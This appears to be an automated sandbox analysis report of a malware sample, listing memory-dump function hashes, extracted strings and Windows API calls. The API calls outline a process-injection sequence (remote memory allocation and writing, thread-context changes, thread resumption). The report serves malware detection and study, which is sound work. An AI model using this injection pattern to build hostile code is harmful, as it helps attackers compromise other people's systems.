                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b0ce0fa28de56c3546c8a189d511d8896c84045e26e78d35c3d67f8ea2c807be
                                                                                                            • Instruction ID: 1eeb13fc58e4a58cacbb12d01d35ad993ab40b7dce871503d2ead3f2ce77703a
                                                                                                            • Opcode Fuzzy Hash: b0ce0fa28de56c3546c8a189d511d8896c84045e26e78d35c3d67f8ea2c807be
                                                                                                            • Instruction Fuzzy Hash: 2B5108B4E112188FDB58CF66D9846DEBBB2FF89310F1480A9D40967255DB346A85CF90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7c453ccf855915cd948c7f527e72f48230358ea6d60c12441af4d9c3a28bbf02
                                                                                                            • Instruction ID: 86bc14fcdf53e11910cd83ae3641f9a12bb882643b102a3046712306f1311eda
                                                                                                            • Opcode Fuzzy Hash: 7c453ccf855915cd948c7f527e72f48230358ea6d60c12441af4d9c3a28bbf02
                                                                                                            • Instruction Fuzzy Hash: 20514AB1E016188BEB68CF6B894579DFAF7AFC9301F14C1BA850CA6214EB341A858F51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e694a210fba8a16b91f83f35277c24084e17aad465a790526a81747a3f953584
                                                                                                            • Instruction ID: 8d92f150290ba4578b9a13ff19d4763a93ee74d77a12391a887fa91922777813
                                                                                                            • Opcode Fuzzy Hash: e694a210fba8a16b91f83f35277c24084e17aad465a790526a81747a3f953584
                                                                                                            • Instruction Fuzzy Hash: 8621BCB1E056188BEB58CF6BDC406DEFBF7AFC8200F14C1BAD508A6264DB345A568F51

                                                                                                            Control-flow Graph

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 8aq$Te]q$Te]q$$]q$$]q
                                                                                                            • API String ID: 0-4290747453
                                                                                                            • Opcode ID: a48fa1ff83deabddbe3d3d7a3fbebebde5aa6ede4164cf2cf63c38c34cda744d
                                                                                                            • Instruction ID: 17ff0ac0e6f38e141b113faa55cb970e14f77494e3529846aeecdf07f569e038
                                                                                                            • Opcode Fuzzy Hash: a48fa1ff83deabddbe3d3d7a3fbebebde5aa6ede4164cf2cf63c38c34cda744d
                                                                                                            • Instruction Fuzzy Hash: 48C13430A05250DFDF498BB8D9657AEBBB1EF86300F58806AE9479B392CB258C43C751
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (o]q$(o]q$(o]q$(o]q
                                                                                                            • API String ID: 0-1261621458
                                                                                                            • Opcode ID: 931e9396954c7f7ffdd91a5162338fac1efae06e647a016e77702e923d55d3aa
                                                                                                            • Instruction ID: 73732f1895f9e54c81606c93ef81de71afc9a2eedfcca06386004f5cc8001d4e
                                                                                                            • Opcode Fuzzy Hash: 931e9396954c7f7ffdd91a5162338fac1efae06e647a016e77702e923d55d3aa
                                                                                                            • Instruction Fuzzy Hash: AEC13530A012099FCF94CF69C984A9EBBF2FF88314F158599EA59AB361D730ED41CB50

                                                                                                            Control-flow Graph

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (o]q$$]q$$]q
                                                                                                            • API String ID: 0-989248301
                                                                                                            • Opcode ID: 3bbee253ef77bd1454cc916c9a1aa7f41f1db7b9de9d99f14a2046ad88656d81
                                                                                                            • Instruction ID: 5c9278007640325ce9b40bd65ffc4eaf3aa6aba937e855aed65ab814ecd571c5
                                                                                                            • Opcode Fuzzy Hash: 3bbee253ef77bd1454cc916c9a1aa7f41f1db7b9de9d99f14a2046ad88656d81
                                                                                                            • Instruction Fuzzy Hash: 7671B1357002048FCF599FA8D994A6E7BB6FB88710B24446AE60ADB391DF34DC42C7A1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761625176.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7150000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: @$TJbq$Te]q
                                                                                                            • API String ID: 0-2800237591
                                                                                                            • Opcode ID: 3a17adf29e53d13b3f85d4bc6b773e4d7119dc362dc1473c72fe2c44eb8693f8
                                                                                                            • Instruction ID: 43a60c45b3abdbe09548473813a022a6014004872662bccf6df0a92ce0fc07f1
                                                                                                            • Opcode Fuzzy Hash: 3a17adf29e53d13b3f85d4bc6b773e4d7119dc362dc1473c72fe2c44eb8693f8
                                                                                                            • Instruction Fuzzy Hash: 2E41C79160E3C04FD3075778982465A7FB29F8B218B1E01CBD182CF2E3CA188C0A83A6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: tP]q$tP]q$tP]q
                                                                                                            • API String ID: 0-513720979
                                                                                                            • Opcode ID: 2c3e7c709f36c7ccdc4637317692217139ffeb487411d6db8580d67e2f0c2c73
                                                                                                            • Instruction ID: 335e142099fb0e34f0657c854bb0e0762ad3e42532ba92331b40bd0a7055f616
                                                                                                            • Opcode Fuzzy Hash: 2c3e7c709f36c7ccdc4637317692217139ffeb487411d6db8580d67e2f0c2c73
                                                                                                            • Instruction Fuzzy Hash: 243149515065809FC70A0774EB7A6AA7FB9AF43610B0CC0DADCC98B303CA268D47D7A1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Haq$Haq
                                                                                                            • API String ID: 0-4016896955
                                                                                                            • Opcode ID: 4220f1ab35a0635002cba7e17ed6e20ee92a317fedd35350842a4cca87b2fdc7
                                                                                                            • Instruction ID: a23a60a468eccaeb263f079ff019ec5ef343119c9195548b9976f3088c5fcbb8
                                                                                                            • Opcode Fuzzy Hash: 4220f1ab35a0635002cba7e17ed6e20ee92a317fedd35350842a4cca87b2fdc7
                                                                                                            • Instruction Fuzzy Hash: 49E1D3317002159FCF4A9F68D854B7EBBA6EB88301F148529EA0ACB391CF74DD42CB91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH]q$PH]q
                                                                                                            • API String ID: 0-1166926398
                                                                                                            • Opcode ID: 68906b41dbce6cd3b7edfdfc10ba8c9c173b47da2c59ccede879d866c0731839
                                                                                                            • Instruction ID: fcd44b429717b6909f9317ad5ba60e3903c3ac3a70beb5a7313419389213c0f9
                                                                                                            • Opcode Fuzzy Hash: 68906b41dbce6cd3b7edfdfc10ba8c9c173b47da2c59ccede879d866c0731839
                                                                                                            • Instruction Fuzzy Hash: 93C107B4600205CFCB18DFA8D994A9DBBF2FF89310F1545A8E516AB3A1DB35EC45CB60
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH]q$PH]q
                                                                                                            • API String ID: 0-1166926398
                                                                                                            • Opcode ID: 27d01de8c83c3f7180e2cc8ea20db02ad763e14be5e9b3107a49df7e33bd3673
                                                                                                            • Instruction ID: 40c661cd90f9ddec21990a5ae2bed39051856aab0183d1e6af97aba10d3aba0a
                                                                                                            • Opcode Fuzzy Hash: 27d01de8c83c3f7180e2cc8ea20db02ad763e14be5e9b3107a49df7e33bd3673
                                                                                                            • Instruction Fuzzy Hash: C5A18270B401088FDF489FB8D954B6E76A6EF89704F248429E606DB3A5DF78DC42CB91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ,aq$,aq
                                                                                                            • API String ID: 0-2990736959
                                                                                                            • Opcode ID: 8378c07bf6401821b67ba1fb92d1cef941d28f0706ea7f888d07f0d6ee59004e
                                                                                                            • Instruction ID: e72b286c9e6bd0f7f97cf4dd8637154e634297187329d011dfafc970390a3d5f
                                                                                                            • Opcode Fuzzy Hash: 8378c07bf6401821b67ba1fb92d1cef941d28f0706ea7f888d07f0d6ee59004e
                                                                                                            • Instruction Fuzzy Hash: 02819130A00206DFDF9ACF69C884AAAF7B2FF89214F168169DA15D7365D731E941CB90
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761625176.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7150000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: TJbq$Te]q
                                                                                                            • API String ID: 0-3147309840
                                                                                                            • Opcode ID: c13b9647ec46951dfabb4d03250ea3dc0285d98c03fe2b84f17170770de89aec
                                                                                                            • Instruction ID: d8196b7473ccf5cf581b5968e2619d9342b5085e73128a0a86c5f49b6b214942
                                                                                                            • Opcode Fuzzy Hash: c13b9647ec46951dfabb4d03250ea3dc0285d98c03fe2b84f17170770de89aec
                                                                                                            • Instruction Fuzzy Hash: 0FF0F6323000154FCA08AB7DE55493F72EBAFCAA20315405EF50ACB3A1CE61DC0347E6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: S!l^
                                                                                                            • API String ID: 0-1174990032
                                                                                                            • Opcode ID: 2616f73f80587bf3e0a966fe96686f396fd221686c3f5123b3c4ef50c05fafc4
                                                                                                            • Instruction ID: 34dc2bb03809163ec0602732f274efbcef26bdf241dd38a0be53a0cea41590db
                                                                                                            • Opcode Fuzzy Hash: 2616f73f80587bf3e0a966fe96686f396fd221686c3f5123b3c4ef50c05fafc4
                                                                                                            • Instruction Fuzzy Hash: 5D6234F0D00B4ACBDB749FF4D49839E7A91AB91304F10492EE1BACB381DB38A455CB55
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761625176.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7150000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Te]q
                                                                                                            • API String ID: 0-52440209
                                                                                                            • Opcode ID: 7564f860faa058c70594d30a13460c4e2a8023fced4050f177c81b4e8f0e357a
                                                                                                            • Instruction ID: 476567e450910b0593fdfd6ed9d352f5cc406ceaeed063a7a86c23943ce3fe17
                                                                                                            • Opcode Fuzzy Hash: 7564f860faa058c70594d30a13460c4e2a8023fced4050f177c81b4e8f0e357a
                                                                                                            • Instruction Fuzzy Hash: B8126F70B14214CBC748BBB8D88966DBBF2BB88704F808869D449E7394DF3C9C46CB52
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761625176.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7150000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Te]q
                                                                                                            • API String ID: 0-52440209
                                                                                                            • Opcode ID: 5bf44a41e7d243693ed551f5c1b18eda3c2224f0eaddbd6506e5717b86f83156
                                                                                                            • Instruction ID: ceb0817c15cacb0a5de466e6db63717a037edfaebc477d871d6355ec045b5190
                                                                                                            • Opcode Fuzzy Hash: 5bf44a41e7d243693ed551f5c1b18eda3c2224f0eaddbd6506e5717b86f83156
                                                                                                            • Instruction Fuzzy Hash: CD125070B14214CFD748BBB8D88966DBBF2BB88704F808969D449E7394DE3C9C46CB56
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: S!l^
                                                                                                            • API String ID: 0-1174990032
                                                                                                            • Opcode ID: b03eb8dea02a73ac5a4ab968702a19558b2120a1cadae09f1257b3bcce6e6dea
                                                                                                            • Instruction ID: 9b45ae84fb05762a100263809b0e123dd06d35f93457a4ad2525f1bd760bb311
                                                                                                            • Opcode Fuzzy Hash: b03eb8dea02a73ac5a4ab968702a19558b2120a1cadae09f1257b3bcce6e6dea
                                                                                                            • Instruction Fuzzy Hash: EF228DF0905B8FCADB709FA4C48439FB690AB55304F20491BE2FACB356D738949ACB55
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 05B989FE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2760678362.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5b90000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: 12a59b50f8ca8acb6b150303e76b6939425b52890b144ac05b7ae67f26fbf763
                                                                                                            • Instruction ID: 42cd6661361ef5d441004fb54d38fc5a20d4b78d065a5f814e7b0338bf80531e
                                                                                                            • Opcode Fuzzy Hash: 12a59b50f8ca8acb6b150303e76b6939425b52890b144ac05b7ae67f26fbf763
                                                                                                            • Instruction Fuzzy Hash: F9815770A00B058FDB28DF29D4447AABBF5FF89304F008969E48AD7A51D775F906CBA1
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05B9F1C2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2760678362.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5b90000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 64341d2ae969edb7d829bcb85b9e9af30e261ea4f0e48542f0c810c266ae1ec1
                                                                                                            • Instruction ID: 6e55f20df2183a7366a2b0562f18f50d503bef92eabb0b43ea0e6469766d95b0
                                                                                                            • Opcode Fuzzy Hash: 64341d2ae969edb7d829bcb85b9e9af30e261ea4f0e48542f0c810c266ae1ec1
                                                                                                            • Instruction Fuzzy Hash: 2B51D0B1D003499FDF15CFA9C884ADEBBB5FF48310F24856AE419AB250D774A885CF90
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05B9F1C2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2760678362.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5b90000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: bf76df3638418faa2da23ef51290e87121c4c3972010e523700b2617b86dbb21
                                                                                                            • Instruction ID: c8243f5f0f62492b195251d9ea45d86e260a8cc46cba5103b01f22cb0656a502
                                                                                                            • Opcode Fuzzy Hash: bf76df3638418faa2da23ef51290e87121c4c3972010e523700b2617b86dbb21
                                                                                                            • Instruction Fuzzy Hash: AE51B1B1D003499FDF15CF9AC884ADEBBB5FF48310F24816AE819AB210D774A845CF90
                                                                                                            APIs
                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 05BC1621
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2760736330.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5bc0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2714655100-0
                                                                                                            • Opcode ID: f6f58dcfdd0aef994427664af8f81e8b01684fb1f2372472f73df6683aed838f
                                                                                                            • Instruction ID: adb0f05f0eefbe59a1e4760f82373a2e774254da927c6b330cf7ac17f06a2242
                                                                                                            • Opcode Fuzzy Hash: f6f58dcfdd0aef994427664af8f81e8b01684fb1f2372472f73df6683aed838f
                                                                                                            • Instruction Fuzzy Hash: 0E4129B9900345CFCB14CF99C448AAABBF5FF99314F24C499D519AB321D334A841CFA4
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0719AF13
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: eb285fa853b7e762e0037c0b60f9774ab24da22960059fcc12976158244224a5
                                                                                                            • Instruction ID: 0e1863428c7e103def6792049fa652791994026600619baab7393b30a5976699
                                                                                                            • Opcode Fuzzy Hash: eb285fa853b7e762e0037c0b60f9774ab24da22960059fcc12976158244224a5
                                                                                                            • Instruction Fuzzy Hash: 5A3159B580438A9FCB11CFA9C4446DEFBF4FF59710F24806AE4A4A7241D7385559CFA2
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 075D36FB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: 5073a1177ae1869e31104b26cff9a580bead7821f53a94c44b9449b9389deb7f
                                                                                                            • Instruction ID: f62a09f320974e64c3a898cb743007a3c544b7399e381abcb3fcb425bd9a178d
                                                                                                            • Opcode Fuzzy Hash: 5073a1177ae1869e31104b26cff9a580bead7821f53a94c44b9449b9389deb7f
                                                                                                            • Instruction Fuzzy Hash: 6121F6B5900249DFCB10CF9AD985ADEBBF4FF48310F108469E869A7351D378A940CFA1
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 075DD310
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: bc30c7d392115af416d642f53fc3602193a03c0d6e88f55bb9c35ac3f185b850
                                                                                                            • Instruction ID: da147b162360f255b957b1c8d76a678d6cf86ae3b812fc34caaaadaba1bdfb18
                                                                                                            • Opcode Fuzzy Hash: bc30c7d392115af416d642f53fc3602193a03c0d6e88f55bb9c35ac3f185b850
                                                                                                            • Instruction Fuzzy Hash: 842105B5D003599FCB10DFAAC885BEEBBF5FF48310F10842AE959A7240D7789954CBA0
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05B9B056,?,?,?,?,?), ref: 05B9B117
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2760678362.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5b90000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05B9B056,?,?,?,?,?), ref: 05B9B117
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2760678362.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5b90000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 075DC8D6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 075DDCEE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 075DDA47
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNELBASE(00000000), ref: 07B3A288
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762215994.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7b30000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DeleteFile
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0719AF13
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 075D36FB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 075DCFAE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 05B989FE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2760678362.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5b90000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 075DE3D5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
